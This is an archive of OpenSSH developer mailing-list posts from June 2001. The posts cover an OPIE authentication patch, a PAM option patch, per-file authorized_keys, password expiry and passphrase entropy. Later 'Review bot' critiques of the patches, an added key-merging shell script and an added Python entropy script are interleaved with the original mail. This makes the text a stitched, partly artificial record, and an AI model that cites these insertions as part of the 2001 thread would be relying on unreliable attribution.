Nothing is fool-proof to a sufficiently talented fool \ | wichert at cistron.nl http://www.liacs.nl/~wichert/ | | 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0 2805 3CB8 9250 2FA3 BC2D | From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 07:46:27 2001 
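Review bot: the new guard in the auth2.c hunk ties the PAM fallback to options.password_authentication, but the call it guards sits in the challenge-response path, immediately after `authenticated = auth2_challenge(authctxt, devs);`, so a PAM keyboard-interactive conversation would be switched off by the PasswordAuthentication keyword rather than by the option that governs challenge-response authentication (ChallengeResponseAuthentication in sshd_config); Markus's reply further down ("pam != password") makes the same point. If the intent is to stop PAM from retrying after a failed challenge, the condition should test the challenge-response/PAM option, and the patch should say which sshd_config keyword it is meant to honour. Also, `diff -wur` ignores whitespace, which hides indentation changes in a one-line conditional like this one; a plain `diff -u` is easier to review.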
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 23:46:27 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 04:25:49PM -0400 References: <20010604220931.B325@folly> Message-ID: <20010604234627.B11445@folly> On Mon, Jun 04, 2001 at 04:25:49PM -0400, Rob Hagopian wrote: > It does worry me that openssh still has a significant amount of ssh.com > v1.2.xx code in it. I'm sure it's been audited a number of times, but > problems have still cropped up in it recently... this is FUD. the PROTOCOL contains some minor defects. this has NOTHING to do with the 1.2.12 code. -m From wichert at cistron.nl Tue Jun 5 07:46:52 2001 From: wichert at cistron.nl (Wichert Akkerman) Date: Mon, 4 Jun 2001 23:46:52 +0200 Subject: OPIE support patch In-Reply-To: <20010603185002.C13880@cistron.nl>; from wichert@cistron.nl on Sun, Jun 03, 2001 at 06:50:02PM +0200 References: <20010603185002.C13880@cistron.nl> Message-ID: <20010604234652.B26589@cistron.nl> Previously Wichert Akkerman wrote: > I just cobbled up a little patch to add support for OPIE to > OpenSSH. Currently untested, but feedback is welcome. Figures that the first draft doesn't work, new patch is below. Don't forget to run autoheader and autoconf before trying. Wichert. diff -wur org/openssh-2.5.2p2/acconfig.h openssh-2.5.2p2/acconfig.h --- org/openssh-2.5.2p2/acconfig.h Sat Mar 17 02:15:38 2001 +++ openssh-2.5.2p2/acconfig.h Mon Jun 4 17:40:16 2001 @@ -184,6 +184,9 @@ /* Define if you want AFS support */ #undef AFS +/* Define if you want OPIE support */ +#undef OPIE + /* Define if you want S/Key support */ #undef SKEY diff -wur org/openssh-2.5.2p2/auth-chall.c openssh-2.5.2p2/auth-chall.c --- org/openssh-2.5.2p2/auth-chall.c Mon Mar 5 07:59:27 2001 +++ openssh-2.5.2p2/auth-chall.c Mon Jun 4 23:40:55 2001 
@@ -67,7 +67,7 @@ debug("verify_response: <%s> = <%d>", response, authok); return authok != 0; } -#else +#else /* BSD_AUTH */ #ifdef SKEY #include @@ -88,6 +88,28 @@ skey_haskey(authctxt->pw->pw_name) == 0 && skey_passcheck(authctxt->pw->pw_name, response) != -1); } +#else /* SKEY */ +#ifdef OPIE +#include + +char * +get_challenge(Authctxt *authctxt, char *devs) +{ + static char challenge[OPIE_CHALLENGE_MAX+64]; + if (opiechallenge(&authctxt->opie_data, authctxt->user, challenge) != 0) { + debug2("opiechallenge failed"); + + return NULL; + } + strlcat(challenge, "\nOPIE Password: ", sizeof challenge); + return challenge; +} +int +verify_response(Authctxt *authctxt, char *response) +{ + return authctxt->valid && !opieverify(&authctxt->opie_data, response); +} + #else /* not available */ char * @@ -101,4 +123,5 @@ return 0; } #endif -#endif +#endif /* !SKEY */ +#endif /* !BSD_AUTH */ diff -wur org/openssh-2.5.2p2/auth.h openssh-2.5.2p2/auth.h --- org/openssh-2.5.2p2/auth.h Mon Mar 5 06:56:41 2001 +++ openssh-2.5.2p2/auth.h Mon Jun 4 17:40:16 2001 @@ -35,6 +35,10 @@ #include #endif +#ifdef OPIE +#include +#endif + typedef struct Authctxt Authctxt; struct Authctxt { int success; @@ -48,6 +52,9 @@ char *style; #ifdef BSD_AUTH auth_session_t *as; +#endif +#ifdef OPIE + struct opie opie_data; #endif }; diff -wur org/openssh-2.5.2p2/configure.in openssh-2.5.2p2/configure.in --- org/openssh-2.5.2p2/configure.in Mon Mar 19 00:09:28 2001 +++ openssh-2.5.2p2/configure.in Mon Jun 4 17:40:16 2001 
@@ -473,6 +473,31 @@ ) LIBS="$LIBS $KLIBS" +# Check whether user wants OPIE support +OPIE_MSG="no" +AC_ARG_WITH(opie, + [ --with-opie=PATH Enable OPIE support], + [ + if test "x$withval" != "xno" ; then + + if test "x$withval" != "xyes" ; then + CPPFLAGS="$CPPFLAGS -I${withval}/include" + LDFLAGS="$LDFLAGS -L${withval}/lib" + fi + + AC_DEFINE(OPIE) + LIBS="-lopie $LIBS" + OPIE_MSG="yes" + + AC_CHECK_FUNC(opiechallenge, + [], + [ + AC_MSG_ERROR([** Incomplete or missing OPIE libraries.]) + ]) + fi + ] +) + # Check whether user wants S/Key support SKEY_MSG="no" AC_ARG_WITH(skey, -- _________________________________________________________________ / Nothing is fool-proof to a sufficiently talented fool \ | wichert at cistron.nl http://www.liacs.nl/~wichert/ | | 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0 2805 3CB8 9250 2FA3 BC2D | From douglas.manton at uk.ibm.com Tue Jun 5 08:00:31 2001 
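Review bot: in the second auth-chall.c hunk (the new `#ifdef OPIE` branch), get_challenge() calls opiechallenge() for authctxt->user without first checking authctxt->valid, while verify_response() does check it; the S/Key branch just above gates on `skey_haskey(authctxt->pw->pw_name) == 0` before doing anything, and the OPIE branch should gate the same way (valid user, and one who actually has an OPIE entry) so that no challenge is generated for a non-existent account. Confirm against the OPIE documentation whether opiechallenge() leaves the user's entry locked until opieverify() runs; if it does, a client that disconnects after receiving the challenge leaves nothing in this code to release it. The challenge is also handed back from a static buffer, and the strlcat() that appends "\nOPIE Password: " discards its return value, so a truncated prompt would go unnoticed.

Review bot: the configure.in hunk issues AC_DEFINE(OPIE) and prepends -lopie before AC_CHECK_FUNC(opiechallenge) has run, and nothing probes for the OPIE header even though the auth.h and auth-chall.c hunks include it; add an AC_CHECK_HEADER for it and move AC_DEFINE after both checks succeed, so a bad --with-opie=PATH fails at configure time with a clear message rather than at compile time. The help string `--with-opie=PATH` should also note that PATH is optional, since the code accepts a bare `--with-opie`.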
From: douglas.manton at uk.ibm.com (douglas.manton at uk.ibm.com)
Date: Mon, 4 Jun 2001 23:00:31 +0100
Subject: Not an OpenSSH Feature Request
Message-ID: <80256A61.0078DC8D.00@d06mta05.portsmouth.uk.ibm.com>

I am not going to put my 2 cents in about added features. I just
appreciate the reams of technical support the OpenBSD developers offer us
for the code they give us for free. $400 for an F-Secure license? I have
my OpenSSH T-shirt!

My request will add zero bytes to the OpenSSH code base, not even in the
contribs directory.

Could the subject lines on the mailing list begin with something like
[OpenSSH]?

I don't know about anyone else, but once you are subscribed to a zillion
mailing lists and want to prioritise (OpenSSH at the top, naturally) it
would make life easier. I am not too fussed, but I thought this might
break the monotony of "Re: authorized_keys2 directory idea" ;-)

Keep up the good work.

--------------------------------------------------------
Doug Manton, AT&T EMEA Commercial Security Solutions
E: demanton at att.com
--------------------------------------------------------
"If privacy is outlawed, only outlaws will have privacy"

From Markus.Friedl at informatik.uni-erlangen.de Tue Jun 5 08:01:40 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 5 Jun 2001 00:01:40 +0200 Subject: password_authtentication option ignored in auth handling In-Reply-To: <20010604234554.A26589@cistron.nl>; from wichert@cistron.nl on Mon, Jun 04, 2001 at 11:45:54PM +0200 References: <20010604234554.A26589@cistron.nl> Message-ID: <20010605000140.A12614@faui02.informatik.uni-erlangen.de> hm, no pam != password. 2.9 has a different fix. On Mon, Jun 04, 2001 at 11:45:54PM +0200, Wichert Akkerman wrote: > > There is one spot where the password_authentication option was ignored, > patch follows. > > Wichert. > > diff -wur org/openssh-2.5.2p2/auth2.c openssh-2.5.2p2/auth2.c > --- org/openssh-2.5.2p2/auth2.c Sun Mar 11 21:01:56 2001 > +++ openssh-2.5.2p2/auth2.c Mon Jun 4 23:31:54 2001 > @@ -397,7 +397,7 @@ > authenticated = auth2_challenge(authctxt, devs); > > #ifdef USE_PAM > - if (authenticated == 0) > + if (options.password_authentication && authenticated == 0) > authenticated = auth2_pam(authctxt); > #endif > xfree(lang); > > -- > _________________________________________________________________ > / Nothing is fool-proof to a sufficiently talented fool \ > | wichert at cistron.nl http://www.liacs.nl/~wichert/ | > | 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0 2805 3CB8 9250 2FA3 BC2D | From solidaridad at ninosdepapel.org Tue Jun 5 07:55:11 2001 From: solidaridad at ninosdepapel.org (Niños de Papel) Date: Mon, 04 Jun 2001 16:55:11 -0500 Subject: Cuanto dinero vas a gastar en estas vacaciones ? Message-ID: <20010604181046.SM00313@segundo> ***** This is an HTML Message ! ***** -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010604/cbc66568/attachment.html From vinschen at redhat.com Tue Jun 5 08:21:50 2001 
From: vinschen at redhat.com (Corinna Vinschen)
Date: Tue, 5 Jun 2001 00:21:50 +0200
Subject: authorized_keys2 directory idea
In-Reply-To: <200106042140.f54LewV25801@cvs.openbsd.org>; from deraadt@cvs.openbsd.org on Mon, Jun 04, 2001 at 03:40:58PM -0600
References: <200106042140.f54LewV25801@cvs.openbsd.org>
Message-ID: <20010605002150.B22495@cygbert.vinschen.de>

On Mon, Jun 04, 2001 at 03:40:58PM -0600, Theo de Raadt wrote:
> If any of you put in 1% of the work Markus has put in, we would listen to
> you.
>
> Am I being harsh?
>
> Yes. Am I being realistic? Yes.

Just the same as in many projects. Many demands, no help.

Corinna

--
Corinna Vinschen
Cygwin Developer
Red Hat, Inc.
mailto:vinschen at redhat.com

From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 09:17:36 2001
From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Tue, 5 Jun 2001 01:17:36 +0200
Subject: authorizedkeys2 for a DHCP based client
In-Reply-To: <20010604165857.C18004@tik.ee.ethz.ch>; from ruf@tik.ee.ethz.ch on Mon, Jun 04, 2001 at 04:58:57PM +0200
References: <20010604122424.A17990@tik.ee.ethz.ch> <20010604161937.D15324@folly> <20010604165857.C18004@tik.ee.ethz.ch>
Message-ID: <20010605011736.A10970@folly>

On Mon, Jun 04, 2001 at 04:58:57PM +0200, Lukas Ruf wrote:
> Pardon me: here comes the whole output when launching
> ssh -v -v komsys-pc-lr

thanks, do you have traces for the server side, too?

From djm at mindrot.org Tue Jun 5 13:24:39 2001
From: djm at mindrot.org (Damien Miller)
Date: Tue, 5 Jun 2001 13:24:39 +1000 (EST)
Subject: authorized_keys2 directory idea
In-Reply-To:
Message-ID:

On Mon, 4 Jun 2001, Rob Hagopian wrote:
> Why even cater to those people? Even the FreeBSD security notices
> specifically mention that ssh v1 has inherent security problems. I don't
> even see why it's turned on by default for a distribution that
> superficially appears so security conscious.

Please spare us the pejorative tone. Security software has to be _usable_
for it to be adopted, by offering SSH protocol 1 support (which is no
longer the default anyway) OpenSSH has done more to migrate users off the
legacy protocol than anyone else.

If you _really_ want key-per-file, why not write a small tool that can
generate authorized_key{,2} from a key-per-file directory?

-d

--
| Damien Miller \    ``E-mail attachments are the poor man's
| http://www.mindrot.org /     distributed filesystem'' - Dan Geer

From stevesk at pobox.com Tue Jun 5 13:32:19 2001
From: stevesk at pobox.com (Kevin Steves)
Date: Mon, 4 Jun 2001 20:32:19 -0700 (PDT)
Subject: Handling of password & account expirations
In-Reply-To: <20010604153741.B4977@basm.cerias.purdue.edu>
Message-ID:

On Mon, 4 Jun 2001, Brian Poole wrote:
:Quoting Darren Moffat (Darren.Moffat at eng.sun.com) from 4 June 2001:
:> >While this no longer applies to OpenBSD now that we have moved to BSD_AUTH I
:> >believe this is still an issue with OpenSSH in the portable release, correct?
:> >We can't expect {Linux,Solaris,} to have BSD_AUTH can we?

a portable BSD auth would be interesting, particularly if it shrinks the
diff with openbsd openssh. i don't see why we can't do this.

:> It shouldn't be an issue on those systems since OpenSSH (unlike the
:> SSH Communications Inc) properly calls pam_acct_mgmt() regardless of
:> which type of authentication was used. On Linux and Solaris the
:> password aging is enforced in a PAM module so the correct thing happens on
:> these systems when the portable release is compiled with PAM support.

and hp-ux 11.X.

:Okay, on Linux and Solaris it appears to be fine. FreeBSD looked good from
:a quick test as well but we can't assume that just because some of the OSes
:are okay that they all are. For example, on NetBSD this still works (just
:like it did on OpenBSD until last week). A log snippet is included at the
:end showing this on a recent snapshot. I assume there are other OSes like
:this. Just because the OS does not have PAM installed does not mean that
:we should let this door hang open, does it?

as i recall, freebsd has integrated a patch for this for a while (since at
least last summer when i looked). yes it is an issue, but i think the
answer may be a portable BSD auth.

From djm at mindrot.org Tue Jun 5 13:34:21 2001
From: djm at mindrot.org (Damien Miller)
Date: Tue, 5 Jun 2001 13:34:21 +1000 (EST)
Subject: authorized_keys2 directory idea
In-Reply-To:
Message-ID:

On Mon, 4 Jun 2001, Rob Hagopian wrote:
> I'm surprised you're advocating the use of sed on authorized_keys files!
>
> It's pretty sick, but: cat keys/* | sort | uniq | sed | split -l 1
> But of course you lose filenames... you might be able to pull them out of
> the comment field... but the point isn't to make it more difficult...

Not much, it probably took you all of 10 seconds to write the previous
paragraph. It would take even less if you make it a script.

> How do you see the time a key was added to your single file? Can you track
> individual key changes through utils like tripwire? How about making some
> keys immutable but allowing others to be updated? Can I make a symlink to
> a common public key that root updates?

If you have special needs, patch your own source. Most of what you ask for
could be accomplished by teaching key_read() to ignore everything after
the '#' character (It may already) - you could dump whatever other
information you require in there.

-d

--
| Damien Miller \    ``E-mail attachments are the poor man's
| http://www.mindrot.org /     distributed filesystem'' - Dan Geer

From mouring at etoh.eviladmin.org Tue Jun 5 13:27:46 2001
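The "small tool" Damien suggests above, and the comment-field trick Rob and Damien both mention, look like this when written out. The script below is an added example for this archive, not code from the thread, from OpenSSH, or from any of the posters; the directory layout (DIR/*.pub, one protocol-2 key per file), the output file name and the function name merge_keys_dir are assumptions. It does a bit more than `cat keys/* | sort | uniq`: it rejects lines that are not `ssh-rsa`/`ssh-dss` entries, de-duplicates on key type plus key blob rather than on the whole line, appends `from:<filename>` to each comment so the per-file provenance survives the merge, and writes the result atomically with mode 0600.

```shell
#!/bin/sh
# merge_keys_dir DIR OUT  (added example; names and layout are assumptions)
#
# Build a single authorized_keys2-style file OUT from a directory DIR that
# holds one protocol-2 public key per file (DIR/*.pub).
#   - blank lines and "#" comment lines are skipped
#   - anything that is not "ssh-rsa|ssh-dss <base64> [comment]" is rejected
#     and reported on stderr instead of being copied into OUT
#   - "from:<filename>" is appended to each entry's comment field
#   - sort -k1,2 -u keeps one line per (key type, key blob), so the same key
#     with two different comments is written only once
#   - OUT is created via temp files made under umask 077 and renamed into
#     place, so a half-written file is never visible to sshd
# Returns 0 on success, non-zero if the output could not be produced.
merge_keys_dir() {
    dir=$1
    out=$2
    tmp="$out.tmp.$$"

    # create the temp file with a restrictive mode without touching the
    # caller's umask
    (umask 077; : > "$tmp") || return 1

    for f in "$dir"/*.pub; do
        [ -f "$f" ] || continue            # no *.pub files: the glob stays literal
        name=$(basename "$f" .pub)
        awk -v src="$name" '
            /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }        # comment or blank
            $1 ~ /^ssh-(rsa|dss)$/ && $2 ~ /^[A-Za-z0-9+\/=]+$/ {
                # whatever follows the blob is the original comment, if any
                c = $0
                sub(/^[ \t]*[^ \t]+[ \t]+[^ \t]+[ \t]*/, "", c)
                if (c == "") print $1, $2, "from:" src
                else         print $1, $2, c, "from:" src
                next
            }
            { print "merge_keys_dir: rejected line in " src ".pub: " $0 > "/dev/stderr" }
        ' "$f" >> "$tmp" || { rm -f "$tmp"; return 1; }
    done

    # sorted, de-duplicated on the first two fields; sorted output also keeps
    # diffs between successive runs stable
    if (umask 077; sort -k1,2 -u "$tmp" > "$tmp.sorted") && mv "$tmp.sorted" "$out"; then
        rc=0
    else
        rc=1
    fi
    rm -f "$tmp" "$tmp.sorted"
    return $rc
}

# usage (paths are placeholders):
#   merge_keys_dir ~/.ssh/authorized_keys.d ~/.ssh/authorized_keys2
```

Because the per-file name travels in the comment, `grep from:alice authorized_keys2` answers the "where did this key come from" question after the merge, and a cron job or a post-commit hook in the key directory's repository can regenerate the single file that sshd actually reads.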
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org)
Date: Mon, 4 Jun 2001 22:27:46 -0500 (CDT)
Subject: Handling of password & account expirations
In-Reply-To:
Message-ID:

On Mon, 4 Jun 2001, Kevin Steves wrote:
> On Mon, 4 Jun 2001, Brian Poole wrote:
> :Quoting Darren Moffat (Darren.Moffat at eng.sun.com) from 4 June 2001:
> :> >While this no longer applies to OpenBSD now that we have moved to BSD_AUTH I
> :> >believe this is still an issue with OpenSSH in the portable release, correct?
> :> >We can't expect {Linux,Solaris,} to have BSD_AUTH can we?
>
> a portable BSD auth would be interesting, particularly if it shrinks the
> diff with openbsd openssh. i don't see why we can't do this.
>

That is what I was thinking. It would be interesting if we could get IRIX
and all the other Commercial OSes that require complex setup to fit into
either BSD Auth or a modified version of it.

- Ben

From vader at conflict.net Tue Jun 5 15:33:13 2001
From: vader at conflict.net (Jim Breton)
Date: Tue, 5 Jun 2001 05:33:13 +0000
Subject: pam_opie
In-Reply-To: <20010602143344.B7257@xor.obsecurity.org>; from kris@obsecurity.org on Sat, Jun 02, 2001 at 02:33:44PM -0700
References: <20010602052718926722.4895@conflict.net> <20010602143344.B7257@xor.obsecurity.org>
Message-ID: <20010605053313936497.4895@conflict.net>

On Sat, Jun 02, 2001 at 02:33:44PM -0700, Kris Kennaway wrote:
> http://www.FreeBSD.org/cgi/cvsweb.cgi/src/lib/libpam/modules/pam_opie/

Thanks, that should work well with my *BSD machines. Was hoping to find
one that would be portable to my Linux systems as well, this one failed
compilation... not sure if it would be easy to port though.

Any ideas about others?

--
Jim B.
vader at conflict.net

From pekkas at netcore.fi Tue Jun 5 15:42:04 2001
From: pekkas at netcore.fi (Pekka Savola)
Date: Tue, 5 Jun 2001 08:42:04 +0300 (EEST)
Subject: Not an OpenSSH Feature Request
In-Reply-To: <80256A61.0078DC8D.00@d06mta05.portsmouth.uk.ibm.com>
Message-ID:

On Mon, 4 Jun 2001 douglas.manton at uk.ibm.com wrote:
> Could the subject lines on the mailing list begin with something like
> [OpenSSH]?
>
> I don't know about anyone else, but once you are subscribed to a zillion
> mailing lists and want to prioritise (OpenSSH at the top, naturally) it
> would make life easier. I am not too fussed, but I thought this might
> break the monotony of "Re: authorized_keys2 directory idea" ;-)

IMO, this would just add an extra 10 characters or so to the subject,
reducing the effectively usable limit.

It's better to base your filtering on sender or receiver addresses.

--
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                    not those you stumble over and fall"
Systems. Networks. Security. -- Robert Jordan: A Crown of Swords

From ms at speakeasy.net Tue Jun 5 15:50:38 2001
From: ms at speakeasy.net (Michael Salmon)
Date: Mon, 4 Jun 2001 22:50:38 -0700
Subject: Not an OpenSSH Feature Request
In-Reply-To: ; from pekkas@netcore.fi on Tue, Jun 05, 2001 at 08:42:04AM +0300
References: <80256A61.0078DC8D.00@d06mta05.portsmouth.uk.ibm.com>
Message-ID: <20010604225038.O14493@speakeasy.net>

procmail

On Tue, Jun 05, 2001 at 08:42:04AM +0300, Pekka Savola wrote:
> On Mon, 4 Jun 2001 douglas.manton at uk.ibm.com wrote:
> > Could the subject lines on the mailing list begin with something like
> > [OpenSSH]?
> >
> > I don't know about anyone else, but once you are subscribed to a zillion
> > mailing lists and want to prioritise (OpenSSH at the top, naturally) it
> > would make life easier. I am not too fussed, but I thought this might
> > break the monotony of "Re: authorized_keys2 directory idea" ;-)
>
> IMO, this would just add an extra 10 characters or so to the subject,
> effectively reducing the usable limit.
>
> It's better to base your filtering on sender or receiver addresses.
>
> --
> Pekka Savola                 "Tell me of difficulties surmounted,
> Netcore Oy                    not those you stumble over and fall"
> Systems. Networks. Security.  -- Robert Jordan: A Crown of Swords
>

From Jarno.Huuskonen at uku.fi Tue Jun 5 16:21:46 2001
From: Jarno.Huuskonen at uku.fi (Jarno Huuskonen)
Date: Tue, 5 Jun 2001 09:21:46 +0300
Subject: OpenSSH tmp cleanup
Message-ID: <20010605092146.A39858@messi.uku.fi>

Hi,

I noticed that Markus has fixed the temporary file cleanup problems in OpenSSH cvs. What files need patching for this? I only noticed changes in: session.c, channels.h and channels.c.

-Jarno

-- 
Jarno Huuskonen

From pekkas at netcore.fi Tue Jun 5 16:58:28 2001
From: pekkas at netcore.fi (Pekka Savola)
Date: Tue, 5 Jun 2001 09:58:28 +0300 (EEST)
Subject: Not an OpenSSH Feature Request
In-Reply-To: <20010604225038.O14493@speakeasy.net>

On Mon, 4 Jun 2001, Michael Salmon wrote:
> procmail

This could be interpreted to mean that procmail can be either a problem or a solution with the current scheme. FWIW, procmail works just fine for me.

> On Tue, Jun 05, 2001 at 08:42:04AM +0300, Pekka Savola wrote:
> > On Mon, 4 Jun 2001 douglas.manton at uk.ibm.com wrote:
> > > Could the subject lines on the mailing list begin with something like
> > > [OpenSSH]?
> > >
> > > I don't know about anyone else, but once you are subscribed to a zillion
> > > mailing lists and want to prioritise (OpenSSH at the top, naturally) it
> > > would make life easier. I am not too fussed, but I thought this might
> > > break the monotony of "Re: authorized_keys2 directory idea" ;-)
> >
> > IMO, this would just add an extra 10 characters or so to the subject,
> > effectively reducing the usable limit.
> >
> > It's better to base your filtering on sender or receiver addresses.
> >
> > --
> > Pekka Savola                 "Tell me of difficulties surmounted,
> > Netcore Oy                    not those you stumble over and fall"
> > Systems. Networks. Security.  -- Robert Jordan: A Crown of Swords
> >
>

-- 
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                    not those you stumble over and fall"
Systems. Networks. Security.  -- Robert Jordan: A Crown of Swords

From djm at mindrot.org Tue Jun 5 18:40:20 2001
From: djm at mindrot.org (Damien Miller)
Date: Tue, 5 Jun 2001 18:40:20 +1000 (EST)
Subject: Not an OpenSSH Feature Request

On Tue, 5 Jun 2001, Pekka Savola wrote:

> On Mon, 4 Jun 2001, Michael Salmon wrote:
> > procmail
>
> This could be interpreted to mean that procmail can be either a problem or a
> solution with the current scheme.

If you have a strong stomach, have a read of the procmail code some time...

-d

-- 
| Damien Miller \   ``E-mail attachments are the poor man's
| http://www.mindrot.org /   distributed filesystem'' - Dan Geer

From pekkas at netcore.fi Tue Jun 5 18:53:39 2001
From: pekkas at netcore.fi (Pekka Savola)
Date: Tue, 5 Jun 2001 11:53:39 +0300 (EEST)
Subject: authorized_keys2 directory idea

On Tue, 5 Jun 2001, Damien Miller wrote:

> If you _really_ want key-per-file, why not write a small tool that
> can generate authorized_key{,2} from a key-per-file directory?

This is a very good idea, and IMO solves most of the problems brought up here. It's still a bit cumbersome to do that daily for 1000 users, but that's kind of a corner case and can, to some extent, be worked around (e.g. do it in shell initscripts, not cron).

Personally, I write code for the community as much as for myself, and if it isn't going to be used widely, I'm not going to do it. This kind of tool enables the best of both worlds: if someone patches OpenSSH, no need to run it; and it works with original OpenSSH too if someone wants the functionality. And the main code base can be kept smaller if that is the desire. An external non-privileged module run from cron, if I may ;-)

I had hoped the thread started by me hadn't degenerated into this kind of "deep discussion". Oh well.

-- 
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                    not those you stumble over and fall"
Systems. Networks. Security.  -- Robert Jordan: A Crown of Swords

From auto92089 at hushmail.com Tue Jun 5 15:06:38 2001
From: auto92089 at hushmail.com (auto92089 at hushmail.com)
Date: Mon, 4 Jun 2001 23:06:38 -0600 (CDT)
Subject: 11.82 bpw clarification (was Re: ssh-keygen(1) misinfo: English prose entropy 0.6 - 1.3 b/char!)
Message-ID: <200106050907.CAA09782@user3.hushmail.com>

>Trolling is such fun, isn't it?

I was trying to make merriment, not to provoke emotional responses. I am conflicted on publicly responding, but decided to clarify just in case your confusion is shared by others with better impulse control. Unfortunately, an unchallenged statement made in the company or under the scrutiny of experts is often assumed true, which is really the original problem I sought to fix! I notice that the maintainers have quietly fixed the problem in the web-accessible ssh-keygen manpage and presumably latest code - thanks. One shudders at how many crypto-enthusiasts have read that page and failed to notice or correct it!

>Entropy rate does not mean that

If you read the manpage which I quoted for your convenience, it said "1-2 bits of entropy per word". Nowhere has anyone mentioned "rate". Even so, a rate is the relation between two measurements, and we could easily have bits per character or bits per word, depending on the definition of "symbol" used. As such, my interpretation (and I suspect many other people's) is that the manpage was describing the entropy of an entire word (...given the word's preceding context). I suspect the original author of the manpage is from Finland also; perhaps the confusion is due to some language difference.

>if you are shown an English word,
>character by character, how long does it take to guess the whole word?
>Try a couple of them:
>moro_
>idio_
>trol_

What you are alluding to is the conditional probability of the (in your examples, last) character dependent on the preceding ones. While that is an interesting measurement, it's not the one under discussion, and has units of "bits per character" (or letter).
http://cs.fit.edu/~mmahoney/dissertation/entropy1.html
"Refining the Estimated Entropy of English by Shannon Game Simulation"
A reasonable primer on Shannon's estimates of entropy.

http://www.stanford.edu/~vjsriniv/project/entropy_of_english_9.htm
Covers both of Shannon's methods for estimating H for English (by character using n-grams, by word using Zipf's relations).

http://www.voynich.nu/wordent.html
"From digraph entropy to word entropy in the Voynich MS"
This is cited here because it relates bits per letter and bits per word by the trivial relation of summing, and because it's very cool. Note that for comparisons of different lengths you need to pad each word with a word-end symbol, the first of which may add some entropy (as in "word" vs. "words").

There's a ton of interesting articles which pop up after searching for "entropy" and "shannon" and ilk, but I must stop somewhere and introduce the coup de grace, courtesy of some obscure man who worked for the telephone company. Note that this is the independent or 0-order entropy; I was unable to find a handy reference with contextual word entropy estimates, but clearly it is far from 1-2 bpw:

"Prediction and Entropy of Printed English", by C.E. Shannon
Bell Syst. Tech. J. 30:50-64 1951

"...Using logarithmic scales for probability and rank, the curve approximates a straight line with slope -1; thus, if p_n is the probability of the nth most frequent word, we have, roughly

    p_n = 0.1/n .

Zipf has pointed out that this type of formula, p_n = k/n, gives a rather good approximation to the word probabilities in many different languages. The formula [above] clearly can not hold indefinitely since the total probability SUM p_n must be unity, while SUM_1^inf 0.1/n is infinite. If we assume (in the absence of any better estimate) that the formula p_n = 0.1/n holds out to the n at which the total probability is unity, and that p_n = 0 for larger n; we find that the critical n is the word rank 8,727.
The entropy is then:

    -SUM_1^8727 p_n log_2 p_n = 11.82 bits per word."

YHNBT. YHL. HAND.

I, Zone Lee

Free, encrypted, secure Web-based email at www.hushmail.com

From Markus.Friedl at informatik.uni-erlangen.de Tue Jun 5 19:17:53 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Tue, 5 Jun 2001 11:17:53 +0200
Subject: 11.82 bpw clarification (was Re: ssh-keygen(1) misinfo: English prose entropy 0.6 - 1.3 b/char!)
In-Reply-To: <200106050907.CAA09782@user3.hushmail.com>; from auto92089@hushmail.com on Mon, Jun 04, 2001 at 11:06:38PM -0600
References: <200106050907.CAA09782@user3.hushmail.com>
Message-ID: <20010605111753.B15889@faui02.informatik.uni-erlangen.de>

On Mon, Jun 04, 2001 at 11:06:38PM -0600, auto92089 at hushmail.com wrote:
> I notice that the maintainers have quietly fixed the problem
> in the web-accessible ssh-keygen manpage and presumably
> latest code - thanks.

this was not 'quietly fixed', since i fixed it in the CVS. however, i did not find a name in your mail, so i could not give credit.

> One shudders at how many crypto-enthusiasts
> have read that page and failed to notice or correct it!

it's been in the ssh-keygen manpage since 1995

From _nuub at yahoo.com Tue Jun 5 19:22:24 2001
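The estimate in the Shannon passage quoted above, carried out as an added example (this is not code from the post, nor from Shannon's paper): extend p_n = 0.1/n rank by rank until the cumulative probability reaches unity, take p_n = 0 beyond that rank, and evaluate -SUM p_n log2 p_n. The script prints what that procedure yields for the cutoff rank and the bits per word, so the numbers can be compared with the figures quoted. It also reports log2 N, the entropy of choosing uniformly from N words, which the passage does not mention but which is the quantity a passphrase built from a fixed word list actually gets. The function names and the `k` parameter for the Zipf constant are this example's own.

```python
import math


def zipf_cutoff(k=0.1, target=1.0):
    """Smallest rank N for which sum_{n=1..N} k/n reaches `target`.

    This is the step in the quoted passage where p_n = k/n is assumed to
    hold until the total probability is unity and to be zero beyond.
    """
    total = 0.0
    n = 0
    while total < target:
        n += 1
        total += k / n
    return n


def zipf_probabilities(n_words, k=0.1):
    """p_n = k/n for ranks 1..n_words, not renormalised, exactly as in the passage."""
    return [k / n for n in range(1, n_words + 1)]


def entropy_bits(probs):
    """Shannon entropy -sum p log2 p in bits; zero-probability symbols contribute 0."""
    return -sum(p * math.log2(p) for p in probs if p > 0)


def zeroth_order_word_entropy(k=0.1):
    """Entropy of the truncated Zipf word model.

    Returns (cutoff_rank, bits_per_word). "Zeroth order" means each word is
    drawn independently of its neighbours, as the poster notes.
    """
    n = zipf_cutoff(k)
    return n, entropy_bits(zipf_probabilities(n, k))


def uniform_word_entropy(n_words):
    """Baseline added here for comparison: every one of n_words is equally
    likely (a word picked at random from a fixed list), log2(n_words) bits."""
    return math.log2(n_words)


if __name__ == "__main__":
    rank, bits = zeroth_order_word_entropy()
    print(f"cutoff rank where SUM 0.1/n reaches 1: {rank}")
    print(f"0-order Zipf entropy:                  {bits:.2f} bits/word")
    print(f"uniform choice among {rank} words:     {uniform_word_entropy(rank):.2f} bits/word")
```

Running the block shows how much the model matters: a Zipf-weighted vocabulary yields noticeably less entropy per word than uniform selection from the same number of words, because frequent words carry little surprise.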
From: _nuub at yahoo.com (nuuB)
Date: Tue, 5 Jun 2001 02:22:24 -0700 (PDT)
Subject: Recent breakins / SSHD root hole?
